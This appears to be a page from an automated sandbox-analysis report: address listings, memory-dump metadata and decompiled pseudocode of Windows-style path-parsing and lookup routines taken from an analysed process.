0x036e6025
0x036e602a
0x036e602b
0x036e6031
0x036e6037
0x036e6038
0x036e603e
0x036e6048
0x036e6049
0x036e604a
0x036e604b
0x036e604c
0x036e604d
0x036e6053
0x036e6054
0x036e6054
0x036e6062
0x036e6065
0x036e6067
0x036e606a
0x036e6070
0x036e6075
0x036e6076
0x036e6081
0x036e6087
0x036e6095
0x036e6099
0x036e609e
0x036e60a4
0x036e60ae
0x036e60b0
0x036e60b3
0x036e60b6
0x036e60b8
0x036e60ba
0x036e60ba
0x036e60ba
0x036e60ba
0x036e60be
0x036e60c0
0x036e60c5
0x036e60c5
0x036e60c5
0x036e60c6
0x036e60cd
0x036e6114
0x036e60cf
0x036e60cf
0x036e60d4
0x036e60d5
0x036e60da
0x036e60db
0x036e60e1
0x036e60e2
0x036e60e8
0x036e60f8
0x036e60fd
0x036e60fe
0x036e6102
0x036e6104
0x036e6107
0x036e6109
0x036e610b
0x036e610b
0x036e610b
0x036e610b
0x036e610f
0x036e610f
0x036e6117
0x036e611a
0x036e611f
0x036e6125
0x036e6134
0x036e6139
0x036e613f
0x036e6146
0x036e6148
0x036e614b
0x036e614d
0x036e614f
0x036e614f
0x036e614f
0x036e614f
0x036e6153
0x036e6159
0x036e6159
0x036e615c
0x036e6163
0x036e6169
0x036e616c
0x036e6172
0x036e6181
0x036e6186
0x036e6187
0x036e618b
0x036e6191
0x036e6195
0x036e61a3
0x036e61bb
0x036e61c0
0x036e61c3
0x036e61cc
0x036e61d0
0x036e61dc
0x036e61de
0x036e61e1
0x036e61e4
0x036e61e6
0x036e61e8
0x036e61e8
0x036e61e8
0x036e61e8
0x036e61e6
0x036e61ec
0x036e61f3
0x036e6203
0x036e6209
0x036e620a
0x036e6216
0x036e621d
0x036e6227
0x036e6241
0x036e6246
0x036e624c
0x036e6257
0x036e6259
0x036e625c
0x036e625e
0x036e6260
0x036e6260
0x036e6260
0x036e6260
0x036e625e
0x036e6264
0x036e6267
0x036e6269
0x036e6315
0x036e6315
0x036e631b
0x036e631e
0x036e6324
0x036e6327
0x036e632f
0x036e6330
0x036e6333
0x036e633a
0x036e633c
0x036e6335
0x036e6335
0x036e6335
0x036e633f
0x036e6342
0x036e634c
0x036e6352
0x036e6355
0x036e6355
0x036e6359
0x00000000
0x036e626f
0x036e6275
0x036e6275
0x036e6278
0x036e627e
0x036e627e
0x036e6281
0x036e6287
0x036e628d
0x036e6298
0x036e629c
0x036e62a2
0x036e629e
0x036e629e
0x036e629e
0x036e62a7
0x036e62a7
0x036e62aa
0x036e62b0
0x036e62f0
0x036e62f0
0x036e62f2
0x036e62f8
0x036e62fd
0x036e62b2
0x036e62b2
0x036e62b2
0x036e62b5
0x036e62dd
0x036e62e2
0x036e62e5
0x036e62b7
0x036e62b8
0x036e62bb
0x036e62bd
0x036e62c0
0x036e62c4
0x036e62cd
0x036e62cd
0x036e62c0
0x036e62bb
0x036e62b5
0x036e6302
0x036e6303
0x036e6305
0x036e6305
0x036e6305
0x036e630c
0x036e630c
0x00000000
0x036e627e
0x036e6269
0x036e5eac
0x036e5ebb
0x036e5ebe
0x036e5ecb
0x036e5ecb
0x036e5ece
0x036e5ece
0x036e5ed4
0x036e5ed7
0x036e5ed9
0x036e5edb
0x036e5edb
0x036e5ee1
0x036e5ee1
0x036e5ee3
0x036e5f20
0x036e5f20
0x036e5ee5
0x036e5ee5
0x036e5ee5
0x036e5ee8
0x036e5f11
0x036e5f18
0x036e5eea
0x036e5eea
0x036e5eed
0x036e5ef2
0x036e5ef8
0x036e5efb
0x036e5f0a
0x036e5f0a
0x036e5eed
0x036e5ee8
0x036e5f22
0x036e5f28
0x00000000
0x00000000
0x036e5f30
0x036e5f31
0x036e5f37
0x036e5f3a
0x036e5f3d
0x036e5f44
0x00000000
0x00000000
0x00000000
0x036e5f46
0x036e5f48
0x036e5f4d
0x00000000
0x036e5f4d
0x036e5dda
0x036e5ddf
0x00000000
0x036e5ddf
0x036e5dd8
0x036e5da7
0x036e5da9
0x036e5dac
0x036e5dae
0x00000000
0x036e5db4
0x036e5db4
0x00000000
0x036e5db4
0x036e5dae
0x036e5d88
0x036e5d8d
0x036e6363
0x036e6369
0x036e636a
0x036e6370
0x036e6372
0x036e637a
0x036e637b
0x036e637d
0x00000000
0x00000000
0x036e637f
0x036e6385
0x00000000
0x036e6385
0x036e5d38
0x036e5d3b
0x00000000
0x00000000
0x00000000
0x036e5d3b
0x036e5d27
0x036e5d29
0x00000000
0x00000000
0x00000000
0x036e6360
0x00000000
0x036e6360
0x036e5c10
0x036e5c10
0x036e63da
0x036e63e5
0x036e63e5

Memory Dump Source

Source File: 0000000A.00000002.473940932.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

Associated: 0000000A.00000002.475043393.000000000370B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.475079693.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b26ababb9e1d69096c3ff7c3ea7387f676a3aceacce0cefeca022a56932896d
Instruction ID: a0f00bd2f7c141e4b78df7c7f56473459ccdbdd85d120ccb26019202b317fa76
Opcode Fuzzy Hash: 0b26ababb9e1d69096c3ff7c3ea7387f676a3aceacce0cefeca022a56932896d
Instruction Fuzzy Hash: A9425975901229CFDB24CF68C980BA9FBB1FF55304F1881AAD94DAB342E7349989CF54

Uniqueness

Uniqueness Score: -1.00%

Function 03634120, Relevance: .4, Instructions: 444
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E03634120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
				signed int _v8;
				void* _v20;
				signed int _v24;
				char _v532;
				char _v540;
				signed short _v544;
				signed int _v548;
				signed short* _v552;
				signed short _v556;
				signed short* _v560;
				signed short* _v564;
				signed short* _v568;
				void* _v570;
				signed short* _v572;
				signed short _v576;
				signed int _v580;
				char _v581;
				void* _v584;
				unsigned int _v588;
				signed short* _v592;
				void* _v597;
				void* _v600;
				void* _v604;
				void* _v609;
				void* _v616;
				void* __ebx;
				void* __edi;
				void* __esi;
				unsigned int _t161;
				signed int _t162;
				unsigned int _t163;
				void* _t169;
				signed short _t173;
				signed short _t177;
				signed short _t181;
				unsigned int _t182;
				signed int _t185;
				signed int _t213;
				signed int _t225;
				short _t233;
				signed char _t234;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t250;
				void* _t251;
				signed short* _t254;
				void* _t255;
				signed int _t256;
				void* _t257;
				signed short* _t260;
				signed short _t265;
				signed short* _t269;
				signed short _t271;
				signed short** _t272;
				signed short* _t275;
				signed short _t282;
				signed short _t283;
				signed short _t290;
				signed short _t299;
				signed short _t307;
				signed int _t308;
				signed short _t311;
				signed short* _t315;
				signed short _t316;
				void* _t317;
				void* _t319;
				signed short* _t321;
				void* _t322;
				void* _t323;
				unsigned int _t324;
				signed int _t325;
				void* _t326;
				signed int _t327;
				signed int _t329;

				_t329 = (_t327 & 0xfffffff8) - 0x24c;
				_v8 =  *0x370d360 ^ _t329;
				_t157 = _a8;
				_t321 = _a4;
				_t315 = __edx;
				_v548 = __ecx;
				_t305 = _a20;
				_v560 = _a12;
				_t260 = _a16;
				_v564 = __edx;
				_v580 = _a8;
				_v572 = _t260;
				_v544 = _a20;
				if( *__edx <= 8) {
					L3:
					if(_t260 != 0) {
						 *_t260 = 0;
					}
					_t254 =  &_v532;
					_v588 = 0x208;
					if((_v548 & 0x00000001) != 0) {
						_v556 =  *_t315;
						_v552 = _t315[2];
						_t161 = E0364F232( &_v556);
						_t316 = _v556;
						_v540 = _t161;
						goto L17;
					} else {
						_t306 = 0x208;
						_t298 = _t315;
						_t316 = E03636E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
						if(_t316 == 0) {
							L68:
							_t322 = 0xc0000033;
							goto L39;
						} else {
							while(_v581 == 0) {
								_t233 = _v588;
								if(_t316 > _t233) {
									_t234 = _v548;
									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
										_t254 = L03634620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
										if(_t254 == 0) {
											_t169 = 0xc0000017;
										} else {
											_t298 = _v564;
											_v588 = _t316;
											_t306 = _t316;
											_t316 = E03636E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
											if(_t316 != 0) {
												continue;
											} else {
												goto L68;
											}
										}
									} else {
										goto L90;
									}
								} else {
									_v556 = _t316;
									 *((short*)(_t329 + 0x32)) = _t233;
									_v552 = _t254;
									if(_t316 < 2) {
										L11:
										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
											_t161 = 5;
										} else {
											if(_t316 < 6) {
												L87:
												_t161 = 3;
											} else {
												_t242 = _t254[2] & 0x0000ffff;
												if(_t242 != 0x5c) {
													if(_t242 == 0x2f) {
														goto L16;
													} else {
														goto L87;
													}
													goto L101;
												} else {
													L16:
													_t161 = 2;
												}
											}
										}
									} else {
										_t243 =  *_t254 & 0x0000ffff;
										if(_t243 == 0x5c || _t243 == 0x2f) {
											if(_t316 < 4) {
												L81:
												_t161 = 4;
												goto L17;
											} else {
												_t244 = _t254[1] & 0x0000ffff;
												if(_t244 != 0x5c) {
													if(_t244 == 0x2f) {
														goto L60;
													} else {
														goto L81;
													}
												} else {
													L60:
													if(_t316 < 6) {
														L83:
														_t161 = 1;
														goto L17;
													} else {
														_t245 = _t254[2] & 0x0000ffff;
														if(_t245 != 0x2e) {
															if(_t245 == 0x3f) {
																goto L62;
															} else {
																goto L83;
															}
														} else {
															L62:
															if(_t316 < 8) {
																L85:
																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
																goto L17;
															} else {
																_t250 = _t254[3] & 0x0000ffff;
																if(_t250 != 0x5c) {
																	if(_t250 == 0x2f) {
																		goto L64;
																	} else {
																		goto L85;
																	}
																} else {
																	L64:
																	_t161 = 6;
																	goto L17;
																}
															}
														}
													}
												}
											}
											goto L101;
										} else {
											goto L11;
										}
									}
									L17:
									if(_t161 != 2) {
										_t162 = _t161 - 1;
										if(_t162 > 5) {
											goto L18;
										} else {
											switch( *((intOrPtr*)(_t162 * 4 +  &M036345F8))) {
												case 0:
													_v568 = 0x35f1078;
													__eax = 2;
													goto L20;
												case 1:
													goto L18;
												case 2:
													_t163 = 4;
													goto L19;
											}
										}
										goto L41;
									} else {
										L18:
										_t163 = 0;
										L19:
										_v568 = 0x35f11c4;
									}
									L20:
									_v588 = _t163;
									_v564 = _t163 + _t163;
									_t306 =  *_v568 & 0x0000ffff;
									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
									_v576 = _t265;
									if(_t265 > 0xfffe) {
										L90:
										_t322 = 0xc0000106;
									} else {
										if(_t321 != 0) {
											if(_t265 > (_t321[1] & 0x0000ffff)) {
												if(_v580 != 0) {
													goto L23;
												} else {
													_t322 = 0xc0000106;
													goto L39;
												}
											} else {
												_t177 = _t306;
												goto L25;
											}
											goto L101;
										} else {
											if(_v580 == _t321) {
												_t322 = 0xc000000d;
											} else {
												L23:
												_t173 = L03634620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
												_t269 = _v592;
												_t269[2] = _t173;
												if(_t173 == 0) {
													_t322 = 0xc0000017;
												} else {
													_t316 = _v556;
													 *_t269 = 0;
													_t321 = _t269;
													_t269[1] = _v576;
													_t177 =  *_v568 & 0x0000ffff;
													L25:
													_v580 = _t177;
													if(_t177 == 0) {
														L29:
														_t307 =  *_t321 & 0x0000ffff;
													} else {
														_t290 =  *_t321 & 0x0000ffff;
														_v576 = _t290;
														_t310 = _t177 & 0x0000ffff;
														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
															_t307 =  *_t321 & 0xffff;
														} else {
															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
															E0365F720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
															_t329 = _t329 + 0xc;
															_t311 = _v580;
															_t225 =  *_t321 + _t311 & 0x0000ffff;
															 *_t321 = _t225;
															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
															}
															goto L29;
														}
													}
													_t271 = _v556 - _v588 + _v588;
													_v580 = _t307;
													_v576 = _t271;
													if(_t271 != 0) {
														_t308 = _t271 & 0x0000ffff;
														_v588 = _t308;
														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
															E0365F720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
															_t329 = _t329 + 0xc;
															_t213 =  *_t321 + _v576 & 0x0000ffff;
															 *_t321 = _t213;
															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
															}
														}
													}
													_t272 = _v560;
													if(_t272 != 0) {
														 *_t272 = _t321;
													}
													_t306 = 0;
													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
													_t275 = _v572;
													if(_t275 != 0) {
														_t306 =  *_t275;
														if(_t306 != 0) {
															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
														}
													}
													_t181 = _v544;
													if(_t181 != 0) {
														 *_t181 = 0;
														 *((intOrPtr*)(_t181 + 4)) = 0;
														 *((intOrPtr*)(_t181 + 8)) = 0;
														 *((intOrPtr*)(_t181 + 0xc)) = 0;
														if(_v540 == 5) {
															_t182 = E036152A5(1);
															_v588 = _t182;
															if(_t182 == 0) {
																E0362EB70(1, 0x37079a0);
																goto L38;
															} else {
																_v560 = _t182 + 0xc;
																_t185 = E0362AA20( &_v556, _t182 + 0xc,  &_v556, 1);
																if(_t185 == 0) {
																	_t324 = _v588;
																	goto L97;
																} else {
																	_t306 = _v544;
																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
																	 *(_t306 + 4) = _t282;
																	_v576 = _t282;
																	_t325 = _t316 -  *_v560 & 0x0000ffff;
																	 *_t306 = _t325;
																	if( *_t282 == 0x5c) {
																		_t149 = _t325 - 2; // -2
																		_t283 = _t149;
																		 *_t306 = _t283;
																		 *(_t306 + 4) = _v576 + 2;
																		_t185 = _t283 & 0x0000ffff;
																	}
																	_t324 = _v588;
																	 *(_t306 + 2) = _t185;
																	if((_v548 & 0x00000002) == 0) {
																		L97:
																		asm("lock xadd [esi], eax");
																		if((_t185 | 0xffffffff) == 0) {
																			_push( *((intOrPtr*)(_t324 + 4)));
																			E036595D0();
																			L036377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
																		}
																	} else {
																		 *(_t306 + 0xc) = _t324;
																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
																	}
																	goto L38;
																}
															}
															goto L41;
														}
													}
													L38:
													_t322 = 0;
												}
											}
										}
									}
									L39:
									if(_t254 !=  &_v532) {
										L036377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
									}
									_t169 = _t322;
								}
								goto L41;
							}
							goto L68;
						}
					}
					L41:
					_pop(_t317);
					_pop(_t323);
					_pop(_t255);
					return E0365B640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
				} else {
					_t299 = __edx[2];
					if( *_t299 == 0x5c) {
						_t256 =  *(_t299 + 2) & 0x0000ffff;
						if(_t256 != 0x5c) {
							if(_t256 != 0x3f) {
								goto L2;
							} else {
								goto L50;
							}
						} else {
							L50:
							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
								goto L2;
							} else {
								_t251 = E03653D43(_t315, _t321, _t157, _v560, _v572, _t305);
								_pop(_t319);
								_pop(_t326);
								_pop(_t257);
								return E0365B640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
							}
						}
					} else {
						L2:
						_t260 = _v572;
						goto L3;
					}
				}
				L101:
			}

0x03634128
0x03634135
0x0363413c
0x03634141
0x03634145
0x03634147
0x0363414e
0x03634151
0x03634159
0x0363415c
0x03634160
0x03634164
0x03634168
0x0363416c
0x0363417f
0x03634181
0x0363446a
0x0363446a
0x0363418c
0x03634195
0x03634199
0x03634432
0x03634439
0x0363443d
0x03634442
0x03634447
0x00000000
0x0363419f
0x036341a3
0x036341b1
0x036341b9
0x036341bd
0x036345db
0x036345db
0x00000000
0x036341c3
0x036341c3
0x036341ce
0x036341d4
0x0367e138
0x0367e13e
0x0367e169
0x0367e16d
0x0367e19e
0x0367e16f
0x0367e16f
0x0367e175
0x0367e179
0x0367e18f
0x0367e193
0x00000000
0x0367e199
0x00000000
0x0367e199
0x0367e193
0x00000000
0x00000000
0x00000000
0x036341da
0x036341da
0x036341df
0x036341e4
0x036341ec
0x03634203
0x03634207
0x0367e1fd
0x03634222
0x03634226
0x0367e1f3
0x0367e1f3
0x0363422c
0x0363422c
0x03634233
0x0367e1ed
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x03634239
0x03634239
0x03634239
0x03634239
0x03634233
0x03634226
0x036341ee
0x036341ee
0x036341f4
0x03634575
0x0367e1b1
0x0367e1b1
0x00000000
0x0363457b
0x0363457b
0x03634582
0x0367e1ab
0x00000000
0x00000000
0x00000000
0x00000000
0x03634588
0x03634588
0x0363458c
0x0367e1c4
0x0367e1c4
0x00000000
0x03634592
0x03634592
0x03634599
0x0367e1be
0x00000000
0x00000000
0x00000000
0x00000000
0x0363459f
0x0363459f
0x036345a3
0x0367e1d7
0x0367e1e4
0x00000000
0x036345a9
0x036345a9
0x036345b0
0x0367e1d1
0x00000000
0x00000000
0x00000000
0x00000000
0x036345b6
0x036345b6
0x036345b6
0x00000000
0x036345b6
0x036345b0
0x036345a3
0x03634599
0x0363458c
0x03634582
0x00000000
0x00000000
0x00000000
0x00000000
0x036341f4
0x0363423e
0x03634241
0x036345c0
0x036345c4
0x00000000
0x036345ca
0x036345ca
0x00000000
0x0367e207
0x0367e20f
0x00000000
0x00000000
0x00000000
0x00000000
0x036345d1
0x00000000
0x00000000
0x036345ca
0x00000000
0x03634247
0x03634247
0x03634247
0x03634249
0x03634249
0x03634249
0x03634251
0x03634251
0x03634257
0x0363425f
0x0363426e
0x03634270
0x0363427a
0x0367e219
0x0367e219
0x03634280
0x03634282
0x03634456
0x036345ea
0x00000000
0x036345f0
0x0367e223
0x00000000
0x0367e223
0x0363445c
0x0363445c
0x00000000
0x0363445c
0x00000000
0x03634288
0x0363428c
0x0367e298
0x03634292
0x03634292
0x0363429e
0x036342a3
0x036342a7
0x036342ac
0x0367e22d
0x036342b2
0x036342b2
0x036342b9
0x036342bc
0x036342c2
0x036342ca
0x036342cd
0x036342cd
0x036342d4
0x0363433f
0x0363433f
0x036342d6
0x036342d6
0x036342d9
0x036342dd
0x036342eb
0x0367e23a
0x036342f1
0x03634305
0x0363430d
0x03634315
0x03634318
0x0363431f
0x03634322
0x0363432e
0x0363433b
0x0363433b
0x00000000
0x0363432e
0x036342eb
0x0363434c
0x0363434e
0x03634352
0x03634359
0x0363435e
0x03634361
0x0363436e
0x0363438a
0x0363438e
0x03634396
0x0363439e
0x036343a1
0x036343ad
0x036343bb
0x036343bb
0x036343ad
0x0363436e
0x036343bf
0x036343c5
0x03634463
0x03634463
0x036343ce
0x036343d5
0x036343d9
0x036343df
0x03634475
0x03634479
0x03634491
0x03634491
0x03634479
0x036343e5
0x036343eb
0x036343f4
0x036343f6
0x036343f9
0x036343fc
0x036343ff
0x036344e8
0x036344ed
0x036344f3
0x0367e247
0x00000000
0x036344f9
0x03634504
0x03634508
0x0363450f
0x0367e269
0x00000000
0x03634515
0x03634519
0x03634531
0x03634534
0x03634537
0x0363453e
0x03634541
0x0363454a
0x0367e255
0x0367e255
0x0367e25b
0x0367e25e
0x0367e261
0x0367e261
0x03634555
0x03634559
0x0363455d
0x0367e26d
0x0367e270
0x0367e274
0x0367e27a
0x0367e27d
0x0367e28e
0x0367e28e
0x03634563
0x03634563
0x03634569
0x03634569
0x00000000
0x0363455d
0x0363450f
0x00000000
0x036344f3
0x036343ff
0x03634405
0x03634405
0x03634405
0x036342ac
0x0363428c
0x03634282
0x03634407
0x0363440d
0x0367e2af
0x0367e2af
0x03634413
0x03634413
0x00000000
0x036341d4
0x00000000
0x036341c3
0x036341bd
0x03634415
0x03634415
0x03634416
0x03634417
0x03634429
0x0363416e
0x0363416e
0x03634175
0x03634498
0x0363449f
0x0367e12d
0x00000000
0x0367e133
0x00000000
0x0367e133
0x036344a5
0x036344a5
0x036344aa
0x00000000
0x036344bb
0x036344ca
0x036344d6
0x036344d7
0x036344d8
0x036344e3
0x036344e3
0x036344aa
0x0363417b
0x0363417b
0x0363417b
0x00000000
0x0363417b
0x03634175
0x00000000

Memory Dump Source

Source File: 0000000A.00000002.473940932.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

Associated: 0000000A.00000002.475043393.000000000370B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.475079693.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b0773c961560794a0688d9f3f46f681211cf1dfeef6509ae45ea20a5b54d21dc
Instruction ID: 70b59fff6f681f30a838b543771d52469cd28e444a098ff7b9c6bd213a80f5c0
Opcode Fuzzy Hash: b0773c961560794a0688d9f3f46f681211cf1dfeef6509ae45ea20a5b54d21dc
Instruction Fuzzy Hash: C4F18B746083118BC725CF1AC580A3AF7E1EF8A714F48496EF886CB350EB35D886CB56

Uniqueness

Uniqueness Score: -1.00%

Function 036420A0, Relevance: .4, Instructions: 420
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E036420A0(void* __ebx, unsigned int __ecx, signed int __edx, void* __eflags, intOrPtr* _a4, signed int _a8, intOrPtr* _a12, void* _a16, intOrPtr* _a20) {
				signed int _v16;
				signed int _v20;
				signed char _v24;
				intOrPtr _v28;
				signed int _v32;
				void* _v36;
				char _v48;
				signed int _v52;
				signed int _v56;
				unsigned int _v60;
				char _v64;
				unsigned int _v68;
				signed int _v72;
				char _v73;
				signed int _v74;
				char _v75;
				signed int _v76;
				void* _v81;
				void* _v82;
				void* _v89;
				void* _v92;
				void* _v97;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char _t128;
				void* _t129;
				signed int _t130;
				void* _t132;
				signed char _t133;
				intOrPtr _t135;
				signed int _t137;
				signed int _t140;
				signed int* _t144;
				signed int* _t145;
				intOrPtr _t146;
				signed int _t147;
				signed char* _t148;
				signed int _t149;
				signed int _t153;
				signed int _t169;
				signed int _t174;
				signed int _t180;
				void* _t197;
				void* _t198;
				signed int _t201;
				intOrPtr* _t202;
				intOrPtr* _t205;
				signed int _t210;
				signed int _t215;
				signed int _t218;
				signed char _t221;
				signed int _t226;
				char _t227;
				signed int _t228;
				void* _t229;
				unsigned int _t231;
				void* _t235;
				signed int _t240;
				signed int _t241;
				void* _t242;
				signed int _t246;
				signed int _t248;
				signed int _t252;
				signed int _t253;
				void* _t254;
				intOrPtr* _t256;
				intOrPtr _t257;
				unsigned int _t262;
				signed int _t265;
				void* _t267;
				signed int _t275;

				_t198 = __ebx;
				_t267 = (_t265 & 0xfffffff0) - 0x48;
				_v68 = __ecx;
				_v73 = 0;
				_t201 = __edx & 0x00002000;
				_t128 = __edx & 0xffffdfff;
				_v74 = __edx & 0xffffff00 | __eflags != 0x00000000;
				_v72 = _t128;
				if((_t128 & 0x00000008) != 0) {
					__eflags = _t128 - 8;
					if(_t128 != 8) {
						L69:
						_t129 = 0xc000000d;
						goto L23;
					} else {
						_t130 = 0;
						_v72 = 0;
						_v75 = 1;
						L2:
						_v74 = 1;
						_t226 =  *0x3708714; // 0x0
						if(_t226 != 0) {
							__eflags = _t201;
							if(_t201 != 0) {
								L62:
								_v74 = 1;
								L63:
								_t130 = _t226 & 0xffffdfff;
								_v72 = _t130;
								goto L3;
							}
							_v74 = _t201;
							__eflags = _t226 & 0x00002000;
							if((_t226 & 0x00002000) == 0) {
								goto L63;
							}
							goto L62;
						}
						L3:
						_t227 = _v75;
						L4:
						_t240 = 0;
						_v56 = 0;
						_t252 = _t130 & 0x00000100;
						if(_t252 != 0 || _t227 != 0) {
							_t240 = _v68;
							_t132 = E03642EB0(_t240);
							__eflags = _t132 - 2;
							if(_t132 != 2) {
								__eflags = _t132 - 1;
								if(_t132 == 1) {
									goto L25;
								}
								__eflags = _t132 - 6;
								if(_t132 == 6) {
									__eflags =  *((short*)(_t240 + 4)) - 0x3f;
									if( *((short*)(_t240 + 4)) != 0x3f) {
										goto L40;
									}
									_t197 = E03642EB0(_t240 + 8);
									__eflags = _t197 - 2;
									if(_t197 == 2) {
										goto L25;
									}
								}
								L40:
								_t133 = 1;
								L26:
								_t228 = _v75;
								_v56 = _t240;
								__eflags = _t133;
								if(_t133 != 0) {
									__eflags = _t228;
									if(_t228 == 0) {
										L43:
										__eflags = _v72;
										if(_v72 == 0) {
											goto L8;
										}
										goto L69;
									}
									_t133 = E036158EC(_t240);
									_t221 =  *0x3705cac; // 0x16
									__eflags = _t221 & 0x00000040;
									if((_t221 & 0x00000040) != 0) {
										_t228 = 0;
										__eflags = _t252;
										if(_t252 != 0) {
											goto L43;
										}
										_t133 = _v72;
										goto L7;
									}
									goto L43;
								} else {
									_t133 = _v72;
									goto L6;
								}
							}
							L25:
							_t133 = _v73;
							goto L26;
						} else {
							L6:
							_t221 =  *0x3705cac; // 0x16
							L7:
							if(_t133 != 0) {
								__eflags = _t133 & 0x00001000;
								if((_t133 & 0x00001000) != 0) {
									_t133 = _t133 | 0x00000a00;
									__eflags = _t221 & 0x00000004;
									if((_t221 & 0x00000004) != 0) {
										_t133 = _t133 | 0x00000400;
									}
								}
								__eflags = _t228;
								if(_t228 != 0) {
									_t133 = _t133 | 0x00000100;
								}
								_t229 = E03654A2C(0x3706e40, 0x3654b30, _t133, _t240);
								__eflags = _t229;
								if(_t229 == 0) {
									_t202 = _a20;
									goto L100;
								} else {
									_t135 =  *((intOrPtr*)(_t229 + 0x38));
									L15:
									_t202 = _a20;
									 *_t202 = _t135;
									if(_t229 == 0) {
										L100:
										 *_a4 = 0;
										_t137 = _a8;
										__eflags = _t137;
										if(_t137 != 0) {
											 *_t137 = 0;
										}
										 *_t202 = 0;
										_t129 = 0xc0000017;
										goto L23;
									} else {
										_t242 = _a16;
										if(_t242 != 0) {
											_t254 = _t229;
											memcpy(_t242, _t254, 0xd << 2);
											_t267 = _t267 + 0xc;
											_t242 = _t254 + 0x1a;
										}
										_t205 = _a4;
										_t25 = _t229 + 0x48; // 0x48
										 *_t205 = _t25;
										_t140 = _a8;
										if(_t140 != 0) {
											__eflags =  *((char*)(_t267 + 0xa));
											if( *((char*)(_t267 + 0xa)) != 0) {
												 *_t140 =  *((intOrPtr*)(_t229 + 0x44));
											} else {
												 *_t140 = 0;
											}
										}
										_t256 = _a12;
										if(_t256 != 0) {
											 *_t256 =  *((intOrPtr*)(_t229 + 0x3c));
										}
										_t257 =  *_t205;
										_v48 = 0;
										 *((intOrPtr*)(_t267 + 0x2c)) = 0;
										_v56 = 0;
										_v52 = 0;
										_t144 =  *( *[fs:0x30] + 0x50);
										if(_t144 != 0) {
											__eflags =  *_t144;
											if( *_t144 == 0) {
												goto L20;
											}
											_t145 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
											goto L21;
										} else {
											L20:
											_t145 = 0x7ffe0384;
											L21:
											if( *_t145 != 0) {
												_t146 =  *[fs:0x30];
												__eflags =  *(_t146 + 0x240) & 0x00000004;
												if(( *(_t146 + 0x240) & 0x00000004) != 0) {
													_t147 = E03637D50();
													__eflags = _t147;
													if(_t147 == 0) {
														_t148 = 0x7ffe0385;
													} else {
														_t148 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
													}
													__eflags =  *_t148 & 0x00000020;
													if(( *_t148 & 0x00000020) != 0) {
														_t149 = _v72;
														__eflags = _t149;
														if(__eflags == 0) {
															_t149 = 0x35f5c80;
														}
														_push(_t149);
														_push( &_v48);
														 *((char*)(_t267 + 0xb)) = E0364F6E0(_t198, _t242, _t257, __eflags);
														_push(_t257);
														_push( &_v64);
														_t153 = E0364F6E0(_t198, _t242, _t257, __eflags);
														__eflags =  *((char*)(_t267 + 0xb));
														if( *((char*)(_t267 + 0xb)) != 0) {
															__eflags = _t153;
															if(_t153 != 0) {
																__eflags = 0;
																E03697016(0x14c1, 0, 0, 0,  &_v72,  &_v64);
																L03632400(_t267 + 0x20);
															}
															L03632400( &_v64);
														}
													}
												}
											}
											_t129 = 0;
											L23:
											return _t129;
										}
									}
								}
							}
							L8:
							_t275 = _t240;
							if(_t275 != 0) {
								_v73 = 0;
								_t253 = 0;
								__eflags = 0;
								L29:
								_push(0);
								_t241 = E03642397(_t240);
								__eflags = _t241;
								if(_t241 == 0) {
									_t229 = 0;
									L14:
									_t135 = 0;
									goto L15;
								}
								__eflags =  *((char*)(_t267 + 0xb));
								 *(_t241 + 0x34) = 1;
								if( *((char*)(_t267 + 0xb)) != 0) {
									E03632280(_t134, 0x3708608);
									__eflags =  *0x3706e48 - _t253; // 0x2bbe118
									if(__eflags != 0) {
										L48:
										_t253 = 0;
										__eflags = 0;
										L49:
										E0362FFB0(_t198, _t241, 0x3708608);
										__eflags = _t253;
										if(_t253 != 0) {
